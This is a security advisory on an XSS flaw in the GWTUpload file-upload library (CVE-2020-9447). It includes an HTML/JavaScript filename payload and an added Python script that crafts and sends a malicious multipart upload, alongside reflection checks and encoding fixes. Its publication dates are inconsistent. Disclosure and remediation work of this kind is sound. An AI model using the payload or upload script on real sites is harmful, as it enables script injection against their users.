GWTUpload XSS in the File Upload Functionality

Advisory ID (Internal): CORE-2020-0003

1. Advisory Information

Title: GWTUpload XSS in the file upload functionality
Advisory ID: CORE-2020-0003
Date published:  2020-03-04
Date of last update:  2020-03-04
Vendors contacted: Manuel Carrasco Moñino (https://github.com/manolo/gwtupload)
Release mode: Forced release

2. Vulnerability Information

Class: Failure to Preserve Web Page Structure ('Cross-site Scripting') | CWE-79
Impact: Code execution (attacker-supplied JavaScript running in the victim's browser), allowing privilege escalation
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name:  CVE-2020-9447

3. Vulnerability Description

GWTUpload is a library for uploading files to web servers that shows real-time updates on file size, bytes transferred and other progress information during the upload. It was developed by Manuel Carrasco Moñino and is hosted on GitHub, the software development site used primarily for hosting source code and providing version control, issue tracking and documentation.

There is an XSS (cross-site scripting) vulnerability in the file upload functionality. An attacker can upload a file whose filename contains HTML and JavaScript; the filename is reflected into the page without HTML encoding, so the script executes in the browser of anyone who views it. Cross-site scripting enables attackers to steal data, change the appearance of a website and perform other malicious activities such as phishing or drive-by attacks.

4. Vulnerable Packages

  • gwtupload-project-1.0.3.
  • potentially older versions of gwtupload

5. Vendor Information, Solutions, and Workarounds

No version has been released to fix the reported issue.

Patches that sanitize the uploaded filename have been developed and submitted to the GitHub project (see the Report Timeline).

6. Credits

This vulnerability was discovered and researched by Alikhan Uzakov from the Application Security Team of Clearswift, A Fortra Company.

The publication of this advisory was coordinated by Pablo Zurro from the CoreLabs Advisories Team.

7. Technical Description / Proof of Concept Code

GWTUpload provides functionality to upload files to web servers, showing a progress bar with real-time updates about the process (file size, bytes transferred, etc.). It uses Ajax requests to ask the web server for the upload progress. It has two components written in Java: the server side, with a servlet and utility classes, and the client side, which is compiled into JavaScript using GWT. This functionality could be abused by an unauthenticated attacker to upload a file whose name carries a script payload; when the filename is rendered in the page without encoding, the payload executes in the browser of whoever views it.

The following proof of concept demonstrates the vulnerability. It can be reproduced as follows:

  1. Deploy the SingleUploadSample war file.
  2. Upload a file whose name contains an HTML/JavaScript payload, for example <img src=x onerror=alert("AppSec")>. Create the file on a Linux system: Windows does not allow the characters <, > and " in filenames, so the file cannot be created there.
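As an added example (not code from the advisory or from the gwtupload project), the Python script below builds the multipart/form-data upload request behind the steps above so that the payload filename is sent directly as a Content-Disposition header value; because the name never touches a local filesystem, the Linux-only restriction in step 2 does not apply when the request is crafted by hand. It then classifies whether a response reflects the filename raw or HTML-encoded, and shows the generic output-encoding fix for the CWE-79 pattern next to a server-side allow-list sanitizer (neither is the patch the advisory authors submitted). The target URL, the form field name and the two sample responses are assumptions constructed for the example, and the payload is a quote-free variant of the advisory's because browsers percent-encode double quotes in multipart filenames.

```python
# Added example: crafted gwtupload-style upload request and reflection check.
# Not the advisory's PoC code and not gwtupload project code.
import html
import re
import urllib.request
import uuid

# The advisory's payload uses double quotes; browsers percent-encode '"' inside a
# multipart filename (WHATWG), so a quote-free variant is used here.
PAYLOAD = "<img src=x onerror=alert(document.domain)>"

# Assumed deployment of the SingleUploadSample war and its upload field name.
TARGET = "http://localhost:8080/SingleUploadSample/servlet.gupld"
FIELD = "GWTU-file"


def encode_multipart_filename(filename: str) -> str:
    """Encode a filename for a Content-Disposition header the way browsers do
    for multipart/form-data: CR, LF and '"' become %0D, %0A and %22."""
    return filename.replace("\r", "%0D").replace("\n", "%0A").replace('"', "%22")


def build_upload_request(filename: str, content: bytes, field: str = FIELD,
                         boundary: str = "") -> tuple:
    """Return (content_type, body) for a single-file multipart upload whose
    filename is attacker-controlled. Nothing here depends on the local OS
    accepting the characters in the name."""
    boundary = boundary or "----gwtupload" + uuid.uuid4().hex
    part_head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; '
        f'filename="{encode_multipart_filename(filename)}"\r\n'
        "Content-Type: text/plain\r\n\r\n"
    )
    body = part_head.encode("utf-8") + content + f"\r\n--{boundary}--\r\n".encode("utf-8")
    return f"multipart/form-data; boundary={boundary}", body


def classify_reflection(response_html: str, filename: str) -> str:
    """'unescaped' if the raw filename is reflected into the response (the XSS
    sink the advisory describes), 'escaped' if only an HTML-encoded copy
    appears, 'absent' otherwise. The surrounding context still needs a manual
    look: a raw copy inside, say, a JSON string is not automatically exploitable."""
    if filename in response_html:
        return "unescaped"
    if (html.escape(filename, quote=True) in response_html
            or html.escape(filename, quote=False) in response_html):
        return "escaped"
    return "absent"


def render_filename(filename: str) -> str:
    """Output-encoding fix: HTML-escape the filename at the point where it is
    written into the page. This is the generic CWE-79 remedy, not the patch
    submitted to the project."""
    return html.escape(filename, quote=True)


_UNSAFE = re.compile(r"[^A-Za-z0-9._-]")


def sanitize_filename(filename: str) -> str:
    """Server-side defence in depth: drop any path component, replace every
    character outside a conservative allow-list, and never return an empty
    or dot-only name. Not a substitute for output encoding."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    cleaned = _UNSAFE.sub("_", base).strip("._")
    return cleaned or "upload"


# Constructed sample responses (not captured from gwtupload): one echoing the
# name raw, one echoing it through render_filename().
VULNERABLE_HTML = f'<div class="upload-status">Uploaded: {PAYLOAD}</div>'
PATCHED_HTML = f'<div class="upload-status">Uploaded: {render_filename(PAYLOAD)}</div>'


def send_upload(url: str, filename: str, content: bytes) -> str:
    """POST the crafted upload to a live deployment and return the response
    body. Network call; the offline checks below never invoke it."""
    content_type, body = build_upload_request(filename, content)
    req = urllib.request.Request(url, data=body, method="POST",
                                 headers={"Content-Type": content_type})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    ctype, body = build_upload_request(PAYLOAD, b"harmless content")
    print(ctype)
    print(body.decode("utf-8"))
    print("constructed vulnerable page:", classify_reflection(VULNERABLE_HTML, PAYLOAD))
    print("constructed patched page:   ", classify_reflection(PATCHED_HTML, PAYLOAD))
    print("sanitized name:", sanitize_filename(PAYLOAD))
    # Against a live SingleUploadSample (assumed URL):
    # print(classify_reflection(send_upload(TARGET, PAYLOAD, b"x"), PAYLOAD))
```

Run the script as-is to see the raw request bytes and the two classifications; point `send_upload` at a real deployment only on a system you are authorized to test. The two server-side functions are deliberately separate: `sanitize_filename` limits what gets stored, but the XSS is only closed by encoding the name wherever it is rendered, which is what `render_filename` does.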

8. Report Timeline

2019-11-12 – Contacted the library creator via email. Unfortunately, no response was received.

2020-02-12 – Opened a GitHub issue.

2020-02-28 – Requested and received CVE from Mitre.

2020-03-04 – Sent fixes to the GitHub project as patches.

2020-03-05 – Library creator informed about the advisory publication.

2020-03-16 – Advisory published.

9. References

10. About CoreLabs

CoreLabs, the research center of Core Security, A Fortra Company, is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team comprises seasoned researchers who regularly discover and disclose vulnerabilities, informing product owners so that a fix can be released efficiently and customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at www.coresecurity.com/core-labs.

11. About Core Security, A Fortra Company

Core Security, a Fortra Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity and access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com.

Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at [email protected]

12. Disclaimer

The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/